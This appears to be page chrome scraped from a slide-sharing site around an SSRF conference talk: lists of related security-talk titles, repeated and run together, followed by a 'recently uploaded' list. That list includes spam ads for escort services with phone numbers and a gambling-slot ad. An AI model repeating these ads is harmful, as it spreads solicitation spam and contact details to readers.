Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakAbraham Aranguren
 
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)Shota Shinogi
 

What's hot (20)

Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
John the ripper & hydra password cracking tool
John the ripper & hydra password cracking toolJohn the ripper & hydra password cracking tool
John the ripper & hydra password cracking tool
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
DVGA writeup
DVGA writeupDVGA writeup
DVGA writeup
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL Applications
 
Sql injection
Sql injectionSql injection
Sql injection
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
HTTPを理解する
HTTPを理解するHTTPを理解する
HTTPを理解する
 
Http security response headers
Http security response headers Http security response headers
Http security response headers
 
Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreak
 
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)
 

Similar to A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! by Orange Tsai

us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...sonjeku1
 
Handy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemHandy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemSneha Inguva
 
Office Comunnications Server 2007 R2 Poster
Office Comunnications Server 2007 R2 PosterOffice Comunnications Server 2007 R2 Poster
Office Comunnications Server 2007 R2 PosterPaulo Freitas
 
Linux Networking Commands
Linux Networking CommandsLinux Networking Commands
Linux Networking Commandstmavroidis
 
Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?
Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?
Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?Julien Vermillard
 
Raconte-moi X.509 : anatomie d'une autorité de certification
Raconte-moi X.509 : anatomie d'une autorité de certificationRaconte-moi X.509 : anatomie d'une autorité de certification
Raconte-moi X.509 : anatomie d'une autorité de certificationJean-Christophe Sirot
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 MarsRémi Dubois
 
05 module managing your network enviornment
05 module managing your network enviornment05 module managing your network enviornment
05 module managing your network enviornmentAsif
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
SAS (Secure Active Switch)
SAS (Secure Active Switch)SAS (Secure Active Switch)
SAS (Secure Active Switch)Security Date
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
8 steps to protect your cisco router
8 steps to protect your cisco router8 steps to protect your cisco router
8 steps to protect your cisco routerIT Tech
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
OpenSSL Basic Function Call Flow
OpenSSL Basic Function Call FlowOpenSSL Basic Function Call Flow
OpenSSL Basic Function Call FlowWilliam Lee
 
CCNA_200-301_June_2023-v1.2.pdf
CCNA_200-301_June_2023-v1.2.pdfCCNA_200-301_June_2023-v1.2.pdf
CCNA_200-301_June_2023-v1.2.pdfCCIEHOMER
 

Similar to A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! by Orange Tsai (20)

us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
 
Stu t17 a
Stu t17 aStu t17 a
Stu t17 a
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
Handy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemHandy Networking Tools and How to Use Them
Handy Networking Tools and How to Use Them
 
Office Comunnications Server 2007 R2 Poster
Office Comunnications Server 2007 R2 PosterOffice Comunnications Server 2007 R2 Poster
Office Comunnications Server 2007 R2 Poster
 
Linux Networking Commands
Linux Networking CommandsLinux Networking Commands
Linux Networking Commands
 
Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?
Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?
Iot Conference Berlin M2M,IoT, device management: one protocol to rule them all?
 
Full Web Stack Security
Full Web Stack SecurityFull Web Stack Security
Full Web Stack Security
 
Raconte-moi X.509 : anatomie d'une autorité de certification
Raconte-moi X.509 : anatomie d'une autorité de certificationRaconte-moi X.509 : anatomie d'une autorité de certification
Raconte-moi X.509 : anatomie d'une autorité de certification
 
Humantalk Angers 14 Mars
Humantalk Angers 14 MarsHumantalk Angers 14 Mars
Humantalk Angers 14 Mars
 
05 module managing your network enviornment
05 module managing your network enviornment05 module managing your network enviornment
05 module managing your network enviornment
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
SAS (Secure Active Switch)
SAS (Secure Active Switch)SAS (Secure Active Switch)
SAS (Secure Active Switch)
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
8 steps to protect your cisco router
8 steps to protect your cisco router8 steps to protect your cisco router
8 steps to protect your cisco router
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
OpenSSL Basic Function Call Flow
OpenSSL Basic Function Call FlowOpenSSL Basic Function Call Flow
OpenSSL Basic Function Call Flow
 
CCNA_200-301_June_2023-v1.2.pdf
CCNA_200-301_June_2023-v1.2.pdfCCNA_200-301_June_2023-v1.2.pdf
CCNA_200-301_June_2023-v1.2.pdf
 

More from CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo PupilloCODE BLUE
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫CODE BLUE
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
 

More from CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Recently uploaded

(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
UNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its PerformanceUNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its Performancesivaprakash250
 
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...ranjana rawat
 
Java Programming :Event Handling(Types of Events)
Java Programming :Event Handling(Types of Events)Java Programming :Event Handling(Types of Events)
Java Programming :Event Handling(Types of Events)simmis5
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Call Girls in Nagpur High Profile
 
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls in Nagpur High Profile
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxupamatechverse
 
Glass Ceramics: Processing and Properties
Glass Ceramics: Processing and PropertiesGlass Ceramics: Processing and Properties
Glass Ceramics: Processing and PropertiesPrabhanshu Chaturvedi
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxAsutosh Ranjan
 
Introduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxIntroduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxupamatechverse
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Christo Ananth
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingrknatarajan
 
result management system report for college project
result management system report for college projectresult management system report for college project
result management system report for college projectTonystark477637
 
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur EscortsRussian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur Escorts
Russian Call Girls in Nagpur Grishma Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur High Profile
 
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCollege Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCall Girls in Nagpur High Profile
 
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escortsranjana rawat
 

Recently uploaded (20)

(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
 
UNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its PerformanceUNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its Performance
 
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
 
Java Programming :Event Handling(Types of Events)
Java Programming :Event Handling(Types of Events)Java Programming :Event Handling(Types of Events)
Java Programming :Event Handling(Types of Events)
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
 
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
